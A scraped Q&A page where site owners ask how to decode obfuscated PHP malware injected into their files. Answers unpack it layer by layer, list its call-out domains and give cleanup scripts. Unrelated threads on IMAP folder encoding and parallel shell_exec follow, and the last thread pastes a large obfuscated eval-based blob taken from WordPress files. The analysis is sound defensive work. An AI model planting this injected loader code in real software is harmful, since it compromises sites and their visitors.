Hacked site - encrypted code - php
A couple of days ago I noticed that almost all PHP files on my server are infected with some encrypted code, and the code is different in almost every file. Here is an example from one of the files:
http://pastebin.com/JtkNya5m
Can anybody tell me what this code does or how to decode it?
You can calculate the values of some of the variables, and begin to get your bearings.
$vmksmhmfuh = 'preg_replace'; //substr($qbrqftrrvx, (44195 - 34082), (45 - 33));
preg_replace('/(.*)/e', $viwdamxcpm, null); // Calls the function wgcdoznijh(); originally: $vmksmhmfuh($ywsictklpo, $viwdamxcpm, NULL);
So the initial purpose is to call the wgcdoznijh() function with the payloads in the script. This is done through a function call embedded in the preg_replace replacement string, which gets executed because of the /e modifier in the expression.
/* aviewwjaxj */ eval(str_replace(chr((257-220)), chr((483-391)), wgcdoznijh($tbjmmtszkv,$qbrqftrrvx))); /* ptnsmypopp */
If you hex decode the result of that you will be just about here:
if ((function_exists("ob_start") && (!isset($GLOBALS["anuna"])))) {
$GLOBALS["anuna"] = 1;
function fjfgg($n)
{
return chr(ord($n) - 1);
}
#error_reporting(0);
preg_replace("/(.*)/e", "eval(implode(array_map("fjfgg",str_split("\x25u:f!>!(\x25\x78:!> ...
The above is truncated, but you have another payload as the replacement argument of the new preg_replace call. Again, because of the /e modifier, it will be executed.
It uses the fjfgg callback with array_map to further decode the payload, which is then passed to eval.
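To read this layer without running any PHP, the fjfgg() callback can be mirrored in a few lines of Python. This is only a sketch: unshift is a made-up name, and it assumes the \x.. escapes in the string have already been resolved to plain characters.

```python
def unshift(text: str) -> str:
    """Mirror of the PHP helper fjfgg(): move every character down by one code point."""
    return "".join(chr(ord(ch) - 1) for ch in text)


# First characters of the truncated payload shown above,
# with "\x25" resolved to "%" and "\x78" resolved to "x".
sample = "%u:f!>!(%x:!>"
print(unshift(sample))  # $t9e = '$w9 =
```

The result is text to read, not code to run, so nothing from the payload is ever evaluated.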
The payload for eval looks like this (hex decoded):
$t9e = '$w9 ="/(.*)/e";$v9 = #5656}5;Bv5;oc$v5Y5;-4_g#&oc$5;oc$v5Y5;-3_g#&oc$5;oc$v5Y5;-2_g#&oc$5;oc$v5Y5;-1_g#&oc$5;B&oc$5{5-6dtz55}56;%v5;)%6,"n\r\n\r\"(edolpxe&)%6,m$(tsil5;~v5)BV%(6fi5;)J(esolcW#5}5;t$6=.6%5{6))000016,J(daerW&t$(6elihw5;B&%5;)qer$6,J(etirwW5;"n\n\X$6:tsoH"6=.6qer$5;"n\0.1/PTTH6iru$6TEG"&qer$5}5;~v5;)J(esolcW#5{6))086,1pi$6,J(tcennocW#!(6fi5;)PCT_LOS6,MAERTS_KCOS6,TENI_FA(etaercW#&J5;~v5)2pi$6=!61pi$(6fi5;))1pi$(gnol2pi#(pi2gnol#&2pi$5;)X$(emanybXteg#&1pi$5;]"yreuq"[p$6.6"?"6.6]"htap"[p$&iru$5;B=]"yreuq"[p$6))]"yreuq"[p$(tessi!(fi5;]"X"[p$&X$5;-lru_esrap#6=p$5;~v5)~^)"etaercWj4_z55}5;%v5;~v5)BV%(6fi5;)cni$6,B(edolpmi#&%5;-elif#&cni$5;~v5)~^)"elifj3_z5}5;ser$v5;~v5)BVser$(6fi5;)hc$(esolcQ5;)hc$(cexeQ&ser$5;)06,REDAEH+5;)016,TUOEMIT+5;)16,REFSNARTNRUTER+5;)lru$6,LRU+5;)(tiniQ&hc$5;~v5)~^)"tiniQj2_z555}5;%v5;~v5)BV%(6fi5;-Z#&%5;~v5)~^)"Zj1_z59 |6: |5:""|B: == |V:tsoh|X:stnetnoc_teg_elif|Z:kcos$|J:_tekcos|W:_lruc|Q:)lru$(|-:_TPOLRUC ,hc$(tpotes_lruc|+:tpotes_lruc|*: = |&: === |^:fub$|%:eslaf|~: nruter|v:)~ ==! oc$( fi|Y:g noitcnuf|z:"(stsixe_noitcnuf( fi { )lru$(|j}}};eslaf nruter {esle };))8-,i$,ataDzg$(rtsbus(etalfnizg# nruter };2+i$=i$ )2 & glf$ ( fi ;1+)i$ ,"0\",ataDzg$(soprts=i$ )61 & glf$( fi ;1+)i$,"0\",ataDzg$(soprts=i$ )8 & glf$( fi };nelx$+2+i$=i$ ;))2,i$,ataDzg$(rtsbus,"v"(kcapnu=)nelx$(tsil { )4 & glf$( fi { )0>glf$( fi ;))1,3,ataDzg$(rtsbus(dro=glf$ ;01=i$ { )"80x\b8x\f1x\"==)3,0,ataDzg$(rtsbus( fi { )ataDzg$(izgmoc noitcnuf { ))"izgmoc"(stsixe_noitcnuf!( fi|0} ;1o$~ } ;"" = 1o$Y;]1[1a$ = 1o$ )2=>)1a$(foezis( fi ;)1ac$,"0FN!"(edolpxe#=1a$ ;)po$,)-$(dtg#(2ne=1ac$ ;4g$."/".)"moc."(qqc."//:ptth"=-$ ;)))e&+)d&+)c&+)b&+)a&(edocne-(edocne-."?".po$=4g$ ;)999999,000001(dnar_tm=po$ {Y} ;"" = 1o$ { ) )))a$(rewolotrts ,"i/" . ))"relbmar*xednay*revihcra_ai*tobnsm*pruls*elgoog"(yarra ,"|"(edolpmi . 
"/"(hctam_gerp( ro )"nimda",)e$(rewolotrts(soprrtsQd$(Qc$(Qa$(( fi ;)"bc1afd45*88275b5e*8e4c7059*8359bd33"(yarra = rramod^FLES_PHP%e^TSOH_PTTH%d^RDDA_ETOMER%c^REREFER_PTTH%b^TNEGA_RESU_PTTH%a$ { )(212yadj } ;a$~ ;W=a$Y;"non"=a$ )""==W( fiY;"non"=a$ ))W(tessi!(fi { )marap$(212kcehcj } ;))po$ ,txet$(2ne(edocne_46esab~ { )txet&j9 esle |Y:]marap$[REVRES_$|W: ro )"non"==|Q:lru|-:.".".|+:","|*:$,po$(43k|&:$ ;)"|^:"(212kcehc=|%: nruter|~: noitcnuf|j}}8zc$9nruter9}817==!9eslaf28)45#9=979{96"5"(stsixe_328164sserpmocnuzg08164izgmoc08164etalfnizg09{9)llun9=9htgnel$9,4oocd939{9))"oocd"(stsixe_3!2| * ;*zd$*) )*edocedzg*zc$(*noitcnuf*( fi*zd$ nruter ) *# = zd$( ==! eslaf( fi;)"j"(trats_boU~~~~;t$U&zesleU~;)W%Y%RzesleU~;)W#Y#RU;)v$(oocd=t$U;"54+36Q14+c6Q06+56Q26+".p$=T;"05+36Q46+16Q55+".p$=1p$;"f5Q74+56Q26+07Q"=p$U;)"enonU:gnidocnE-tnetnoC"(redaeHz)v$(jUwz))"j"(stsixe_w!k9 |U:2p$|T:x\|Q:1\|+:nruter|&:lmth|%:ydob|#:} |~: { |z:(fi|k:22ap|j:noitcnuf|w:/\<\(/"(T &z))t$,"is/|Y:/\<\/"(1p$k|R:1,t$ ,"1"."$"."n\".)(212yad ,"is/)>\*]>\^[|W#; $syv= "eval(str_replace(array"; $siv = "str_replace";$slv = "strrev";$s1v="create_function"; $svv = #//}9;g$^s$9nruter9}9;)8,0,q$(r$=.g$9;))"46x.x?x\16\17x\".q$.g$(m$,"*H"(p$9=9q$9{9))s$(l$<)g$(l$(9elihw9;""9=9g$9;"53x$1\d6x\"=m$;"261'x1x.1x\"=r$;"351xa\07x\"=p$;"651.x%1x&1x\"=l$9{9)q$9,s$(2ne9noitcnuf;}#; $n9 = #1067|416|779|223|361#; $ll = "preg_replace"; $ee1 = array(#\14#,#, $#,#) { #,#[$i]#,#substr($#,#a = $xx("|","#,#,strpos($y,"9")#,# = str_replace($#,#x3#,#\x7#,#\15#,#;$i++) {#,#function #,#x6#,#); #,#for($i=0;$i
Which looks truncated ...
That is as far as I have time for, but if you want to continue you may find the following URL useful.
http://ddecode.com/
Good luck
I found the same code in a WordPress instance and wrote a short script to remove it from all files:
$directory = new RecursiveDirectoryIterator(dirname(__FILE__));
$iterator = new RecursiveIteratorIterator($directory);
foreach ($iterator as $filename => $cur)
{
    $contents = file_get_contents($filename);
    if (strpos($contents, 'tngmufxact') !== false && strlen($contents) > 13200 && strpos($contents, '?>', 13200) == 13278) {
        echo $filename.PHP_EOL;
        file_put_contents($filename, substr($contents, 13280));
    }
}
Just change the string 'tngmufxact' to the one from your obfuscated version and everything will be removed automatically.
The length of the obfuscated block may differ in your case, so check the offsets first, and don't test this in your live environment!
Be sure to back up your files before executing this!
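Before letting any script rewrite files, a read-only pass that only lists the affected files is a cheap sanity check. A minimal sketch in Python, assuming the marker is one of the random variable names from your own infection ('tngmufxact' is the one from the script above); find_infected is a hypothetical helper name and it never modifies anything.

```python
from pathlib import Path


def find_infected(root: str, marker: str) -> list:
    """Return the paths of all .php files under root whose contents contain marker."""
    needle = marker.encode()
    hits = []
    for path in sorted(Path(root).rglob("*.php")):
        # Skip directories that happen to end in .php
        if path.is_file() and needle in path.read_bytes():
            hits.append(str(path))
    return hits
```

Calling find_infected(".", "tngmufxact") from the web root and comparing the list with what the cleanup script prints shows whether the hard-coded offsets catch every infected file.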
I've decoded this script and it is (except for the obfuscation) exactly the same as the one in this question: Magento Website Hacked - encryption code in all php files
The URLs inside are the same too:
33db9538.com
9507c4e8.com
e5b57288.com
54dfa1cb.com
If you are unsure or inexperienced, don't try to execute or decode the code yourself; get professional help.
Besides that: the decoding was done manually by picking out pieces of the code and partially executing them (inside a virtual machine, just in case something bad happens).
So basically I've repeated this over and over:
echo the hex strings to get the plain text (to find out which functions get used)
always replace eval with echo
always replace preg_replace("/(.*)/e", ...) with echo(preg_replace("/(.*)/", ...))
The e at the end of the regular expression means evaluate (like the php function eval), so don't forget to remove that too.
In the end you have a few function definitions and one of them gets invoked via ob_start.
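The first step in the list above, turning the hex strings into plain text, does not need PHP at all. A rough sketch in Python, assuming only the \xNN (hex) and \NNN (octal) escapes of PHP double-quoted strings matter; decode_php_escapes is a made-up name, and other escapes such as \n, \\ or \$ are deliberately left untouched.

```python
import re

# \x followed by 1-2 hex digits, or a backslash followed by 1-3 octal digits
_ESCAPE = re.compile(r"\\x([0-9A-Fa-f]{1,2})|\\([0-7]{1,3})")


def decode_php_escapes(text: str) -> str:
    """Resolve hex and octal escapes the way a PHP double-quoted string would."""
    def repl(match):
        if match.group(1) is not None:
            return chr(int(match.group(1), 16))
        # PHP silently wraps octal values above 0377, hence the mask
        return chr(int(match.group(2), 8) & 0xFF)
    return _ESCAPE.sub(repl, text)


# Start of the truncated string from the answer further up
print(decode_php_escapes(r"\x25u:f!>!(\x25\x78:!>"))  # %u:f!>!(%x:!>
```

Because the input is only ever treated as text, this is safe to run on the raw file contents outside a virtual machine.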
Related
imap_mail_move() not working on special characters (äüö...)
I am using imap_mail_move() to move emails from one folder to another. This works pretty well, but not when there are special characters in the folder name. I am sure I need to encode the name, but all my tests were unsuccessful. Does anybody have a good idea? Thanks in advance.
class EmailReader {
    [...]
    function doMoveEmail($uid, $targetFolder) {
        $targetFolder = imap_utf8_to_mutf7($targetFolder);
        $return = imap_mail_move($this->conn, $uid, $targetFolder, CP_UID);
        if (!$return) {
            $this->printValue(imap_errors());
            die("stop");
        }
        return $return;
    }
    [...]
}
Calling the function in the script:
[...]
$uid = 1234;
$folderTarget1 = "INBOX.00_Korrespondenz";
$this->doMoveEmail($uid, $folderTarget1);
$folderTarget2 = "INBOX.01_Anmeldevorgang.011_Bestätigungslink";
$this->doMoveEmail($uid, $folderTarget2);
[...]
The first call (folderTarget1) works fine. The second call (folderTarget2) produces an error:
[TRYCREATE] Mailbox doesn't exist: INBOX.01_Anmeldevorgang.011_Bestätigungslink (0.001 + 0.000 secs).
Remark 1: if I call imap_list(), the name of the folder is shown as "INBOX.01_Anmeldevorgang.011_Besta&Awg-tigungslink" (= $val). Using:
$new = mb_convert_encoding($val,'UTF-8','UTF7-IMAP');
echo $new; // gives --> "INBOX.01_Anmeldevorgang.011_Bestätigungslink"
but:
$new2 = mb_convert_encoding($new,'UTF7-IMAP', 'UTF-8');
echo $new2; // gives --> "INBOX.01_Anmeldevorgang.011_Best&AOQ-tigungslink"
Remark 2: I checked each possible encoding with the following script, but none of them matches the value that is returned by imap_list().
// looking for "INBOX.01_Anmeldevorgang.011_Besta&Awg-tigungslink" given by imap_list().
$targetFolder = "INBOX.01_Anmeldevorgang.011_Bestätigungslink";
foreach(mb_list_encodings() as $chr){
    echo mb_convert_encoding($targetFolder, $chr, 'UTF-8')." : ".$chr."<br>";
}
Your folder name as stored on the server, Besta&Awg-tigungslink, is not canonically encoded: &Awg- decodes to the combining diaeresis character. Using some convenient Python to look it up:
import base64
import unicodedata
x = base64.b64decode('Awg=').decode('utf-16be')  # equals sign added to satisfy base64 padding requirements
unicodedata.name(x)  # Returns 'COMBINING DIAERESIS'
This combines with the a in front of it to show ä. Your encoder is returning the more common precomposed form:
x = base64.b64decode('AOQ=').decode('utf-16be')
unicodedata.name(x)  # Returns: 'LATIN SMALL LETTER A WITH DIAERESIS'
This is a representation of ä directly. Normally, when you work with IMAP folders, you pass around the raw name, and only convert the folder name for display. As you can see, there is not necessarily a one-to-one mapping from glyphs to encodings in Unicode. It does surprise me that PHP seems to be doing a canonicalization step when encoding; I would expect round-tripping the same data to return the same thing.
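The mismatch between the two forms can be reproduced and reconciled with Unicode normalization. A small sketch in Python, assuming the usual IMAP modified UTF-7 rules (base64 of UTF-16BE, no padding, "," in place of "/"); decode_mutf7_chunk is a hypothetical helper that handles only the part between "&" and "-".

```python
import base64
import unicodedata


def decode_mutf7_chunk(chunk: str) -> str:
    """Decode the base64 part of a modified UTF-7 escape, e.g. 'Awg' from '&Awg-'."""
    padded = chunk.replace(",", "/") + "=" * (-len(chunk) % 4)
    return base64.b64decode(padded).decode("utf-16-be")


decomposed = "a" + decode_mutf7_chunk("Awg")  # 'a' followed by U+0308
precomposed = decode_mutf7_chunk("AOQ")       # U+00E4

print(decomposed == precomposed)                                # False
print(unicodedata.normalize("NFC", decomposed) == precomposed)  # True
print(unicodedata.normalize("NFD", precomposed) == decomposed)  # True
```

So the two names compare equal only after normalizing both to the same form, which is why keeping the raw server name around for IMAP calls is the safer route.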
I created a workaround that lets me work with UTF-8 values and translate them back to the original (raw) IMAP folder name.
function getFolderList() {
    $folders = imap_list($this->conn, "{".$this->server."}", "*");
    if (is_array($folders)) {
        // Remove server details from each element of the array
        $folders = array_map(function($val) {
            return str_replace("{".$this->server."}","",$val);
        }, $folders);
        // Sort array
        asort($folders);
        // Renumber the list
        $folders = array_values($folders);
        // Add a UTF-8 encoded value to the array.
        // This is needed because the original value is so weird that it is not possible
        // to encode it with a function on the fly. The additional UTF-8 value is used to
        // map the UTF-8 value to the original value. The original value is still needed
        // for operations such as:
        // - imap_mail_move()
        // - imap_reopen()
        // ==> the trick is to use normalizer_normalize()
        $return = array();
        foreach ($folders as $key => $folder) {
            $return[$key]['original'] = $folder;
            $return[$key]['utf8'] = normalizer_normalize(mb_convert_encoding($folder,'UTF-8','UTF7-IMAP'));
        }
        return $return;
    } else {
        die("IMAP_Folder-List failed: " . imap_last_error() . "\n");
    }
}
Execute every N command in parallel in shell_exec() in PHP
I'd like to execute N commands in bash in parallel. And then the next N commands after all the commands finish, and then the next N commands … Because I am not an expert in shell scripting, I have resorted to PHP. But I suspect my code is not doing what I needed optimally: <?php // d() is a function like var_dump() d($d); $ips = array( "83.149.70.159:13012" => 8, "37.48.118.90:13082" => 77, "83.149.70.159:13082" => 77,); d($ips); reset($ips); $prx = "storm"; $f = array(); foreach ($d as $calln) { $ip = current($ips); $ipkey = key($ips); d($ip, $ipkey); $comd = choose_comd($prx); d( $comd); $f[] = shell_exec($comd); d($f); choose_limiting ($prx); d($GLOBALS['a']); } function choose_comd ($prx) { d($GLOBALS['calln']); switch ($prx) { case "storm": return "cd /Users/jMac-NEW/HoldingForDO/phub/phubalt_pages && curl -x {$GLOBALS['ipkey']} \"https://catalog.loc.gov/vwebv/search?searchArg={$GLOBALS['calln']}&searchCode=CALL%2B&searchType=1&limitTo=none&fromYear=&toYear=&limitTo=LOCA%3Dall&limitTo=PLAC%3Dall&limitTo=TYPE%3Dall&limitTo=LANG%3Dall&recCount=1200\" >trial_{$GLOBALS['calln']}_out.html 2> trial_{$GLOBALS['calln']}_error.txt &";; // more cases ... } function choose_limiting ($prx){ switch ($prx) { case "": if (!next($ips)) { sleep (80); reset($ips); } case "storm": if (!isset($GLOBALS['a'])) { echo "if"; $GLOBALS['a'] = 0; } elseif ($GLOBALS['a'] == current($GLOBALS['ips'])) { echo "elseif"; next($GLOBALS['ips']); sleep(80/count($GLOBALS['ips']) - 7); // 80 is the standard $GLOBALS['a'] = 0; } else { echo "else"; $GLOBALS['a']++; } } } function trying () { $GLOBALS['a']++; d($GLOBALS['a']); } Firstly, I am not sure if running a loop around shell_exec("command… &") will make all the commands run in parallel. Secondly, the loop runs around all the possible commands, but is made to sleep() with an arbitrary / estimated duration of 70 after every N commands are run with shell_exec(). 
A 70-second sleep may or may not match the time it takes all of the previous N commands to complete; I am just assuming it will be around that. Does what I have done achieve my aim? If not, why not, and what other solution is there? Actually, I do not mind just using bash directly, but the problem is that every iteration of the loop needs to be fed a variable $calln from a PHP array $d populated in earlier parts of the script (not shown). If PHP can do what I need, please stick to PHP.
Malicious code found in WordPress theme files. What does it do?
I discovered this code inserted at the top of every single PHP file inside of an old, outdated WordPress installation. I want to figure out what this script was doing, but have been unable to decipher the main hidden code. Can someone with experience in these matters decrypt it? Thanks! <?php if (!isset($GLOBALS["anuna"])) { $ua = strtolower($_SERVER["HTTP_USER_AGENT"]); if ((!strstr($ua, "msie")) and (!strstr($ua, "rv:11"))) $GLOBALS["anuna"] = 1; } ?> <?php $nzujvbbqez = 'E{h%x5c%x7825)j{hnpd!opjudovg-%x5c%x7824]26%x5c%x7824-%x5c%x7825)54l}%x5c%x7827;%x5c%x7825!<x5c%x782f#)rrd%x5c%x83]256]y81]265]y72]254]y76]61]y33]68]y34]68]y<X>b%x5c%x7825Z<#opo#>b{jt)!gj!<*2bd%x5c%x7euhA)3of>2bd%x5c%x7825!<5h%x5c%x78225%x5c%x7824-%x5c%x7824*<!~!dsfbuf%x5c%x)utjm6<%x5c%x787fw6*CW&)7gj6<*K)ftpmdXA6~6<u%%x7824Ypp3)%x5c%x7825cB%x5c%x7825iN}#-!tus66,#%x5c%x782fq%x5c%x7825>2q%x5c%x7825<#g6R85,67R37,18R#>#<!%x5c%x7825tww!>!%x5c%x782400~:<h%x5c%x7825_t%x5c%x7825:osvufs%x5c%x78257>%x5c%x782272qj%x5c%x7825)7gj6<**2qj%x5cc%x7860GB)fubfsdXA%x5c%x7827K6<%x5c%x787fw6*3qj985-rr.93e:5597f-s.973:8297f:5297e:56-%x5c%x7878284]364]6]234]342]58]24]311]278]y3f]51L3]84]y31M6]y3e]81#%x5c%x782f#73]y72]282#<!%x5c%x7825tjw!>!x5c%x7825%x5c%x787f!25ww2)%x5c%x7825w%x5c%x7860TW~%x5c%x7824<%x5c%x78e%x5c%x78b%x5c%x7825:|:7#6#)tutjyf%x5c%x7860439275ttfsqnpd8;0]=])0#)U!%x5c%x7827{**u%x5c%x7%x78257-K)fujs%x5c%x7878X6<#o]o]Y%x5c%x7.3%x5c%x7860hA%x5c%x7827pd%x5c%x782525)n%x5c%x7825-#+I#)q%x5c%x7825:>:r%x5c%x7825:|:**t%x5c%x7825)m%x55%x5c%x782f#0#%x5c%x782f*#npd%}#-#%x5c%x7824-%x5c%x7824-tusvd},;uqpuft%x5c%x7860>>>!}_;gvc%x5c%x7825}&;ftmbg}%x5c%x787f;!osvufs}w;*%x5c%x787?]_%x5c%x785c}X%x5c%x7824<!%x5c%x7825tzw>!#]gj!|!*nbsbq%x5c%x7825)323ldfidk!~!<**qp%x5c%x7825!-uyf5c%x78256<.msv%x5c%x7860ftsbqA7>q%x5c%x78256<%)7gj6<*QDU%x5c%x7860MPT7-NBFSUT%x5c%x7860LDPT7-UFOJ%x5tcvt)fubmgoj{hA!osvufs!~<3,j%x5c%x7825>j%x5c%x7825!*3!%x5c%x7!>#p#%x5c%x782f#p#%x5c%x782f%x5c%x7825z<jg!)%x5c%x7825z>>2*!%x25%x5c%x7824-%x5c%x7824b!>!%x5c%
x7825yy)#y76]252]y85]256]y6g]257]y86]267]y74]275]y7:]268]y7f%x7822l:!}V;3q%x5c%x7825}U;y]}R;2]},;osvufs}%x5c%x786<.fmjgA%x5c%x7827doj%x825-#jt0}Z;0]=]0#)2q%x5c%xx5c%x785c%x5c%x7825j^%x5c%x7824-%x5c%x7824tvctus)%x5c%x78%x7825!*9!%x5c%x7827!hmg%x5c%x7825)!gj!~<ofmy%x5c%x7%x7825%x5c%x7878:!>#]y3g]61]y3f]63]y3:]68]y76#<%x5c%x78ec%x7825!**X)ufttj%x5c%x7822)r.985:52985-t.98]K4]65]D8]86]y37827pd%x5c%x78256<pd%x5c%x7825w6Z6<]5]48]32M3]317]445]212]445]43]321]464]n)%x5c%x7825bss-%x5c%x7825r%x5c%x7878B%x5c%x782so!sboepn)%x5c%x7825epnbss-%x5c%x7825r%x5c%x7878W~!Ypp2)%x5cW~!%x5c%x7825z!>2<!gps)%x5c%x7825j>1<%x5c%x7825j=6[%x5c%x7825ww2%x5c%x78b%x5c%x7825w:!>!%x5c27;mnui}&;zepc}A;~!}%x5c%x787f;!|!}{;)gj}l;33bq}%x5c%x7824%x5c%x782f%x5c%x7825kj:-!OVMM*<(<%xufs:~928>>%x5c%x7822:ftmbg39*56A:>:8:^<!%x5c%x7825w%x5c%x7860%x5c%x785c^>Ew:Qb:Qc:5cq%x5c%x78257**^#zsfvr#27-SFGTOBSUOSVUFS,6<*msv%x5c%x78257-MSc%x7825=*h%x5c%x7825)m%x5c%x7825):fmji%xc%x7825w6<%x5c%x787fw6*CWtfs%x5c%x7825)7gj6<*id1%x29%73", NULL); }IjQeTQcOc%x5c%x782f#00#W~!Ydrr)%x5c%x7825r%x5c%x7878Bsfuv5c%x7827pd%x5c%x78256<C%x5c%x7827pd%x5c%x78256|6.7ec%x787f%x5c%x787f%x5c%x787f%x5%x5c%x7825)ftpmdR6<*id%x5c%x78mm)%x5c%x7825%x5c%x7878:-!%x5c%x7825tzw%x5c%x782f%x5c%x7824)#P#-#Q#-#B#-#T#-#7825l}S;2-u%x5c%x7825!-#2#%**#ppde#)tutjyf%x5c%x78604%x5c%x78223}!+!<]y74]256]y39]252]y83]2761"])))) { $GLOBALS["%x61%156%x75%156%x61"]=1; funx5c%x782fqp%x5c%x7825>5h%x5c%x7825!<*::::::-111112)%x7825zB%x5c%x7825z>!tussfw)%x5c%xu{66~67<&w6<*&7-#o]s]o]s]#)fepmqyf%x5c%x7827*&7-n%x5c%x7825**#k#)tutjyf%x5c%x7860%x5c%x7878%x5c165%x3a%146%x21%76%x21%50%x5cction fjfgg($n){return 
78256<pd%x5c%x7825w6Z6<.4%x5c%x7860hA%x5c%x76]277]y72]265]y39]271]y83]256]y78]248]y827!hmg%x5c%x7825!)!gj!<2,*qpt)%x5c%x7825z-#:#*%x5c%x7824-%x5c%x7824x7825%x5c%x7824-%x5c%x7824y4%x5c%x7824-%x5c%x7824]y8%x5c%x7824doF.uofuopD#)sfebfI{*w%x5c%x7825)kV%x5c%x7878{c%x7825)!>>%x5c%x7822!ftmbg)!gj<*#k#)usbut%x5c%x7860cpV%x561%154%x28%151%x6d%160%x6c%157%x6%x5c%x7824gps)%x5c%x7825j>1<%x5c%x7825j=tj{fpg)%x5c%x785j:.2^,%x5c%x7825b:<!%x5c%x<2p%x5c%x7825%x5c%x787f!~!<##!>!2p%x5c%x7825Z<^2%x5c%x785c2b%x5c%x78*uyfu%x5c%x7827k:!ftmf!}Z;^nbsbq%x5c%x7825%x5c%x785cSFWSFT%x5c%x78787fw6*%x5c%x787f_*#ujojRk3%x5c%x7860{666~6<&w6<%x5c%x787fw6*CW%x7860hfsq)!sp!*#ojneb#-*f%x5c%x7825)sf%x57###7%x5c%x782f7^#iubq#%x5c%x785cq%x5c%x5c%x7825)!gj!<2,*j%x5c%x7825-#1]#-bubE{h%x5c%x7825)tpqsut>j%x5c61%171%x5f%155%x61%160%x28%42%x66%152%x66%147%x67%42%x2c%163%x7x5c%x787fw6*%x5c%x787f_*#fubfsdXk5%x5c%x7860{66~6<&w6<%x5ce:55946-tr.984:75983:48984:71]K9]77]D4]82]K6]72]K9]78x5c%x7825o:W%x5c%x7825c:>1<%x5c%x7825b:>1<!gps)%x5c%x782x5c%x7825j:,,Bjg!)%x5c%x7825j:>>1*!%k;opjudovg}%x5c%x7877825r%x5c%x785c2^-%x5c%x7825hOh%x5c%x782f#00#W~!%}6;##}C;!>>!}W;utpi}Y;tuofuopd%x5c%x7860ufh%x5c%x7860fmjg}[;ldpt%x5!|!**#j{hnpd#)tutjyf%x5c%x7860opjudovg%x5c%x7822)!gj}1~!%x5c%x7827{ftmfV%x5c%x787f<*X&Z&S{ftmfV%x5c%x787f<*XAZASV<*w%x5c%5c%x7878:<##:>:h%x5c%x7825:<#64y]552]e7y]#>n%x5c%x77825c:>%x5c%x7825s:%x5c%x785c%x5c%x7825j25!>!2p%x5c%x7825!*3>?*2b%x5c%x7825)gpf%x5c%x7825!*##>>X)!gjZ<#opo#>b%x533]65]y31]53]y6d]281]y43825<#762]67y]562]38y]572]48y]j%x5c%x7825!|!*#91y]c9y]g2y]#>>*4-1-bubE{h%x5c%x7825)sutcvt)!gj!|!*bubx7824-!%x5c%x7825%x5c%x7824-%x5c%x7824*!|!%x5c%x7824-%x5c%x7824%%x5c%x7825)}.;%x5c%x7860UQPMSVD!-id%x5c%x5c%x7825t2w)##Qtjw)#]82#-#!#-%x5c%x7825tmw)%x5c%x7825tww**WYsboep5h>#]y31]278]y3e]81]K78:56985:6197g:74787fw6<*K)ftpmdXA6|7**197-2qj%x5c%x78257-K)udfoopdXA%x5c%x7822o]#%x5c%x782f*)323zbe!-#jt0*?]+^782f#00;quui#>.%x5c%x7825!<***f%x5c%x7946:ce44#)zbssb!>!ssbnpe_GMFT%x5c%x7860QIQc%x7825}K;%x5c%x7860ufldpt}X;%x5c%x
7860msvd}R;*msv5c%x782f#%x5c%x782f},;#-#}+;%x5c%x7825-qp%x5c%x7&f_UTPI%x5c%x7860QUUI&e_SEEB%x5c%x7860FUPNFS&d_SFSFGFS%x5c%x7860QUUI&5c%x78256<%x5c%x787fw6*%x5c%x787f_*#fmjgk4%x5c%x7860{6~6<tfs%x5+{e%x5c%x7825+*!*+fepdfe{h+{d%x5c%x7825)+opjudovg+)!gj+{25)Rb%x5c%x7825))!gj!<*#cd1%x5c%x782f20QUUI7jsv%x5c%x78257UFH#%x5c%x7827rfs%x5c%x78256~6<%x5c%xj!|!*msv%x5c%x7825)}k~~~<ftm4-%x5c%x7824y7%x5c%x7824-%x5ce%x5c%x7825!osvufs!*!+A!>!{e%x5x7825)uqpuft%x5c%x7860msc%x7825>U<#16,47R57,27R]K5]53]Kc#<%x5c%x7825tp&)7gj6<.[A%x5c%x7827&6<%x5c%x787fw6*%x5c%x787f_*#[k2%x5c%x7860{6:!}7;!x7825!<**3-j%x5c%x78%x5c%x7825bT-%x5c%x7825hW~%x5c%x7825fdy)##-!#~<%x5c%x7825h00#*<%x5c%x7825nfd)##Qtpz)#]341]88M4P8]37]278]225]241]3x5c%x782f#%x5c%x7825#%x5c%x782f#mqnj!%x5c%x782f!#0#)idubn%x5c#]y84]275]y83]248]y83]256]y81]265]y72]254]y76#<%x5c#-%x5c%x7825tdz*Wsfuvso!%x5c%78242178}527}88:}334}472%x5c%x7824<!%x5c%x7825mm!>!#]y81]273fttj%x5c%x7822)gj6<^#Y#%x5c%x785cq%x5c%x7825%x5c%x7827Y%x>!bssbz)%x5c%x7824]25%x5c%x7824-%x5c%x7825%x5c%x7827jsv%x5c%x78256<C>^#zsfvr#%x5c%x785c%x78256<^#zsfvr#%x5c%x785cq%x5c%x78257%x5c%x782f#QwTW%x5c%x7825hIr%x5c%x785c1^-%x5c%xf!>>%x5c%x7822!pd%x5c%x7825)!gj}Z;h!opjudovg}{;60%x5c%x7825}X;!sp!*#opo#>>}R;msv}.;%x5c%x782f#%xc%x787f<u%x5c%x7825Vif((function_exists("%x6f%142%x5f%163%x74%141%x7%x78246767~6<Cw6<pd%x5c%x7825w6Z6<.5%x5c%x7860hA%x5c%x7827pd%x5c%xz!>!#]D6M7]K3#<%x5c%x7825yy>#]D6]281L1#%x5c%x782f#M5]DgP5]D6#<%x5c%x7825fdy>#]D4]273]D6P2L5P6]y6gP7L6M7]D4x5c%x78257>%x5c%x782f7&6|7**11x5c%x785c1^W%x5c%x7825c!>!%x5c%x7825i%x5c%x785c2^<!Ce*[!%x5 
c%x7825c5c%x7825z>3<!fmtf!%x5c%x7825z>2<!%x5c%x7825)dfyfR%x5c%x7827tfs%x54%162%x5f%163%x70%154%x69%164%50%x22%134%x78%62%x35%c%x78256<*17-SFEBFI,6<*127-UVPFNJU,6<*#)tutjyf%x5c%x7860opjudovg)!gE#-#G#-#H#-#I#-#K#-#L#-#M#-#[#-#Y#-#D#-#W#-#C#-#O#-#N#*j%x5c%x7825!-#1]#-bubE{h%x5c%x7825)tpqsut>j%x5c%x7%x7825tmw!>!#]y84]275]y83]273]y76]277#<%x5c%x7825t2w>#]y74]273]%x5c%x785cq%x5c%x7825)uoe))1%x5c%x782f35.)1%x5c%x782f14+9**-)1%x5c%x782f2986+7**^%x5c%x782f%x!>!tus%x5c%x7860sfqmbdf)%x5c%4:]82]y3:]62]y4c#<!%x5c%x7825t::!>!%x5c%x7825)hopm3qjA)qj3hopmA%x5c%x78273qj%x5c%x78256<*Y%x6<pd%x5c%x7825w6Z6<.2%x5c%x7860hA%x]252]y74]256#<!%x5c%x7825ggg)(0)%x5c%x782f+*0f(-!#]yq%x5c%x7825V<*#fopoV;hojepmsvd}+;!>!}%x5c%x7827;!4%145%x28%141%x72%162%x7827!hmg%x5c%x7825)!gj!|!*1?hmg%x5c%x7825)!gj!<**2-4-bubE{h%x5#57]38y]47]67y]37]88y]